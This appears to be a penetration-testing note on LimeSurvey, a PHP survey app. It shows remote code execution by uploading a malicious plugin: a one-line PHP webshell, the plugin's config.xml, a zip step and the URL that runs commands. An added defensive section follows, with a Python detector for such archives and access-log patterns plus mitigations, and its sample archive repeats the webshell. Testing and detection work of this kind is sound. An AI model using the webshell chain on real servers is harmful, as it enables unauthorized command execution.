LimeSurvey

Open source online statistical survey web app written in PHP, using a MySQL, SQLite, PostgreSQL or MSSQL database.

Enumeration
Configuration file
application/config/config.php
RCE via malicious plugin
  • In the settings menu, there’s a Plugins option

  • At the plugins page there’s an Upload & install button. Clicking it pops a form asking for a Zip file

Write a PHP shell (saved here as tokyo.php, the name used in the zip step below)
<?php system($_REQUEST['cmd']); ?>
Create the plugin configuration file the installer requires (config.xml)
<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>ExampleSettings</name>
        <type>plugin</type>
        <creationDate>2014-05-27</creationDate>
        <lastUpdate>2024-02-09</lastUpdate>
        <author>Denis Chenu</author>
        <authorUrl>https://www.sondages.pro</authorUrl>
        <version>3.0.0</version>
        <license>GNU General Public License</license>
        <description><![CDATA[Example plugin showing all settings]]></description>
    </metadata>

    <compatibility>
        <version>3</version>
        <version>4</version>
        <version>5</version>
        <version>6</version>
    </compatibility>

    <updaters disabled="disabled">
    </updaters>
</config>
Zip it all together
zip tokyo.zip tokyo.php config.xml
  • Upload it and click Install

  • Installed plugins are stored in /upload/plugins/ExampleSettings/ (the directory name comes from the <name> element in config.xml)

Visit the URL
/upload/plugins/ExampleSettings/tokyo.php?cmd=id
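From the defender's side, the two artefacts this technique leaves are a plugin archive carrying a PHP file with a command sink fed from the request, and web-server log lines that execute a .php file directly under /upload/plugins/ instead of going through index.php. The script below is an added example (not part of the original page or of LimeSurvey) that checks both; the log lines and the plugin archive are constructed samples, and the combined log format is an assumption.

```python
import io
import re
import zipfile

# Constructed combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Feb/2024:10:01:40 +0000] "GET /index.php/admin/pluginmanager HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Feb/2024:10:02:11 +0000] "GET /upload/plugins/ExampleSettings/tokyo.php?cmd=id HTTP/1.1" 200 57 "-" "curl/8.4.0"
198.51.100.7 - - [09/Feb/2024:10:03:00 +0000] "GET /upload/plugins/ExampleSettings/assets/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Plugin code is meant to run through index.php; a .php file requested directly under
# /upload/plugins/ is the webshell access pattern shown on this page.
DIRECT_PLUGIN_PHP = re.compile(r'^/upload/plugins/[^/?]+/.*\.php(\?|$)', re.IGNORECASE)
# Command/eval sinks whose argument list pulls from a request superglobal.
SINK_RE = re.compile(r'\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\([^;]*?\$_(REQUEST|GET|POST|COOKIE)\b')

def flag_direct_plugin_php(log_text):
    """Return (ip, path, status) for each request that executes PHP straight out of /upload/plugins/."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and DIRECT_PLUGIN_PHP.match(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits

def find_request_sinks(php_source):
    """Return sink function names fed from $_REQUEST/$_GET/$_POST/$_COOKIE in one PHP file."""
    return [m.group(1) for m in SINK_RE.finditer(php_source)]

def scan_plugin_zip(zip_bytes):
    """Check a plugin archive before 'Upload & install': map each .php member to its flagged sinks."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".php"):
                sinks = find_request_sinks(zf.read(name).decode("utf-8", "replace"))
                if sinks:
                    findings[name] = sinks
    return findings

def build_sample_zip():
    """Constructed archive mirroring the page's layout: config.xml, a plugin class, and a webshell."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.xml", "<config><metadata><name>ExampleSettings</name></metadata></config>")
        zf.writestr("ExampleSettings.php", "<?php class ExampleSettings extends PluginBase {}")
        zf.writestr("tokyo.php", "<?php system($_REQUEST['cmd']); ?>")
    return buf.getvalue()
```

The same two checks map to mitigations: deny direct execution of .php under /upload/ at the web server, and restrict the plugin-upload permission to trusted administrators.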
